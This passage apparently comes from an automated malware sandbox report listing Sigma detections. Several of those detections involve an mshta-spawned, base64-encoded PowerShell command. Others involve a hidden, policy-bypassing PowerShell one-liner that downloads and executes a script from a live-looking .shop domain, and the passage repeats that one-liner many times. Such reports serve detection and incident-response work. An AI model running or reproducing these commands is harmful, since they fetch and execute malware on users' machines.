JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADAATwBSAE4AegBTAHMAWgA3AEEAagBCAFQAWgBJAGQAOABiAFEAOABCADUAUQA2AE8AcwBSAGwAZQA2AGQASABRAGsAWgBwAEwAeQBxAHIAcABpAHUATQBtAFgAUQBSAFcAWQBGAGwAOABFAG8AbABJAFcAUQB0ADUAcABnAE0AagA2AFkAdQBwAFIAYwBEADkAeAA2AFMATQBYADEAcwBaADMAVAA1AG4ARgA5AHoANgB1AEwAbABjAEoAOQBHAEUAaQBUAFoAOQBhAFQATAA4AGYANQBxAGIAWQBMAGcAagAyAFIAeQBuADkAaQBqAE4AdABuAHgAVAByAG0AcwBRAGMAcQBnADEAVgBaAGsAUABoAFYAaABkADUAdwBvAHIATgB2AG4AMgA1AGYAWABYAE8AYQBTAHcAMQBqAFcARwBBAGsAagBkADQATAB6AHcATwBuAGwAZABwAGoARABkADEASwBTAGgAWABkADcAbwBTAFkANwBOAFAAeAB5AFUATABzADcAZwBGADkAZQBxAGMAUwBPAG4AOQAyAGYAYwBmAEkAUQB5AEYAegBLAGUAdwBhAEgAcgB4AEkAUQBvAGYATwBEAGUATABiAFkAQwB0AHEATABpAHMAYQBGAE0AYwBRAHoAQwBsAHQAawBkAG0AMwBSADkATQBPAHAAbAAgAD0AIAAiAEMAbwBtAHAAcgBlACIAIAA
        Sigma detected: Suspicious MSHTA Child Process
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADAATwBSAE4AegBTAHMAWgA3AEEAagBCAFQAWgBJAGQAOABiAFEAOABCADUAUQA2AE8AcwBSAGwAZQA2AGQASABRAGsAWgBwAEwAeQBxAHIAcABpAHUATQBtAFgAUQBSAFcAWQBGAGwAOABFAG8AbABJAFcAUQB0ADUAcABnAE0AagA2AFkAdQBwAFIAYwBEADkAeAA2AFMATQBYADEAcwBaADMAVAA1AG4ARgA5AHoANgB1AEwAbABjAEoAOQBHAEUAaQBUAFoAOQBhAFQATAA4AGYANQBxAGIAWQBMAGcAagAyAFIAeQBuADkAaQBqAE4AdABuAHgAVAByAG0AcwBRAGMAcQBnADEAVgBaAGsAUABoAFYAaABkADUAdwBvAHIATgB2AG4AMgA1AGYAWABYAE8AYQBTAHcAMQBqAFcARwBBAGsAagBkADQATAB6AHcATwBuAGwAZABwAGoARABkADEASwBTAGgAWABkADcAbwBTAFkANwBOAFAAeAB5AFUATABzADcAZwBGADkAZQBxAGMAUwBPAG4AOQAyAGYAYwBmAEkAUQB5AEYAegBLAGUAdwBhAEgAcgB4AEkAUQBvAGYATwBEAGUATABiAFkAQwB0AHEATABpAHMAYQBGAE0AYwBRAHoAQwBsAHQAawBkAG0AMwBSADkATQBPAHAAbAAgAD0AIAAiAEMAbwBtAHAAcgBlACIAIAA
        Sigma detected: Suspicious PowerShell Encoded Command Patterns
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADAATwBSAE4AegBTAHMAWgA3AEEAagBCAFQAWgBJAGQAOABiAFEAOABCADUAUQA2AE8AcwBSAGwAZQA2AGQASABRAGsAWgBwAEwAeQBxAHIAcABpAHUATQBtAFgAUQBSAFcAWQBGAGwAOABFAG8AbABJAFcAUQB0ADUAcABnAE0AagA2AFkAdQBwAFIAYwBEADkAeAA2AFMATQBYADEAcwBaADMAVAA1AG4ARgA5AHoANgB1AEwAbABjAEoAOQBHAEUAaQBUAFoAOQBhAFQATAA4AGYANQBxAGIAWQBMAGcAagAyAFIAeQBuADkAaQBqAE4AdABuAHgAVAByAG0AcwBRAGMAcQBnADEAVgBaAGsAUABoAFYAaABkADUAdwBvAHIATgB2AG4AMgA1AGYAWABYAE8AYQBTAHcAMQBqAFcARwBBAGsAagBkADQATAB6AHcATwBuAGwAZABwAGoARABkADEASwBTAGgAWABkADcAbwBTAFkANwBOAFAAeAB5AFUATABzADcAZwBGADkAZQBxAGMAUwBPAG4AOQAyAGYAYwBmAEkAUQB5AEYAegBLAGUAdwBhAEgAcgB4AEkAUQBvAGYATwBEAGUATABiAFkAQwB0AHEATABpAHMAYQBGAE0AYwBRAHoAQwBsAHQAawBkAG0AMwBSADkATQBPAHAAbAAgAD0AIAAiAEMAbwBtAHAAcgBlACIAIAA
        Sigma detected: Suspicious PowerShell Parameter Substring
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADA
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGkAeABQAHoAZwBmAGoAUwBuAEoAOQBBAEYAVwBFAFkASwBMAEUAWQBZAHIATABCAEMAZQBkAFgANABkAEsAbgBJAFoARgB3AHcAYgBoAEEARABWAHMATQBPAGIAbAB1AFgAOABSAFkARQBJAGEATABPAHEATQBDAFAASAB3AEQAdQBZAHgAVABPADQAdAAyAEgAbQBsAHoARgB5AGMATQBtAEgAMQA4AGMARwB6AEoAWgBnAEkANQBzAHgAUwBuAHkAZQBmADYAbgB5AHAAdABLAGUAdgA1AEEAWAA1AFIAdwBCADQAZABrAHEARQBJAE0AZgBRAFcAMwB0AEcAQwBSAFYATQBPAHAARQA0AEcAdABpAEEAeQBtAEIANgBmADMAYwBkAHIANwBCAE0AUQBQAEcAaQBtAFkAYgBkAFIAbQBQAFYANQBBAFIAWQBoAGIAUwBnADcAegBvAEsAVAB0AE4AZwBJAEkARQBJAEgAbgBjAFoAVgAyADAANABzAE4AVQBSAGQAYgBOADkAYwBXAFcAUQBLAHUATQBwAGoAcQBtAGgAeQBtAEcAYwBRAHcAMABDADcAdQB1AFQAUQByAEcAMAAxAEYAZgAyAFgAegAgAD0AIgBEAGUAZgBsAGEAIgAgACsAIAAiAHQAZQBTAHQAcgBlAGEAbQAiADsAJABkADEATwBCAHgATAAxADcAVQAxADQANABWAFEAbABpADkAZAA5AFEATwBMADcANQB6AFQAMAAzAHgASABJAEwAYgBrAHoAZABnADkAWAA1AEEAWABjAEUAMQB4ADAAUAB1ADgAVQBRADkAVABiAG0ARQBWADkAYgBUAGEAWABGAGMATwA4ADIAeABVADcAbAB3AG4AVgBTAHMAUQAyAHMAOABFAGgAZABnAEQAaQBaAGsATwA3AFMAZwB6ADA
        Sigma detected: PowerShell Download Pattern
        Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABuAE0AcQA1AEwAaQBPAGIAUABYAEgAVwBGAEgAbABkAGsAOQBQAFMAMQBPAEcAeQBSADQAMwBJAGMAdwByAFgAWgBkAE8ATQBiAEYATgBLAFQAUQAgAD0AIAAkAGYAQQBMAHMARQANAAoAJAB6AEYAUQBQAGEAcQBzAHcANgB6AHUAMgBlAGgANQBKAGMATgBIAFoAaABsAHkAbwBjAFoAaABXAFoAMQBqAGsANABiAEsAUQBjAHQAawBtAGEAWABpAGwAQwB6ADIAcABzAEwATABqAEwAegB1AGMAawBiAFQAdAB5AEUARQBWAHIASAB5AG0AMgBjAGgARQBCAHUAUQA3AGMAeQBkAE4AIAA9ACAAJABUAFIAVQBlAA0ACgAkAGsATQBJAGIAdwBJAFMAOABUAHEAMwA2ADYAMABrAGEAbgAyAEMAWQBGAE0AYwBkAFcAZQBOAEIAVwAxAHcAWQBWAHUAegBvAEMAYgBaADYANgB5AHIAbgBXAGUAdQB3ADkATQBEAEkAdwBEAGcAZQBTAEsAZAA1AHAAWQAxAEcAWQBpAEgAVwBnAEUAVwBMAHkAUQBSADgAZAAyAEoAbwA3AFQAawBNAFEAYwBNADMAawAzAG8ARQBSADcAaABzAFoATgBOAHMAOABPADMATgBDAGIAMwBBAFAATgBqADQATQBsAEYAUwBlAGwAdwBNAHQAUwBpAHoAQgBYAGkAUQBwAFAAYwBWAGsAeAB0AEgAUQBZAEMAVQBDAFcAMgBTAEkAdwBIAFAARwBsAFkAcABLAHQAdQBHAGQASgBjAEsAYQBYADYANgA2AG4AZwByAFMAOAA2AEQAdgBFAEQAZwAwAGUARABHAHMAcQBSAEgAeABkAGcAbQA2AE4ARQBxAE8AawBjADYARwA3AEcARABRAEQARgB2AHUAcABCAEcAcQB2ADQAagA1AEUAbABwAHkAUAB2ADAAcQBjAE4ANwBaADUAZwB1AHcAZQBMAEQAVQB1AFUAcgBQAHEAbAAgAD0AIAAkAG4AVQBMAEwADQAKACQAbQBkAEEATQBZAG0AVQBFAGIAYgBwAHgAQgBXAFkAQQBhAHMAWgBtAE4AUwBXADcATwBMAEoAQQByAGUAUABIAFgASABUAFQAUQA1AHMANgBNAHEAcQBuAHcAdwBFADAAcABlAFcARwBlAFoATQBvAE4AdABKADMARgBSADcAUwB4AHUAWQBjAHEAcwBkAGoAcwBiAGIAbQBrAGk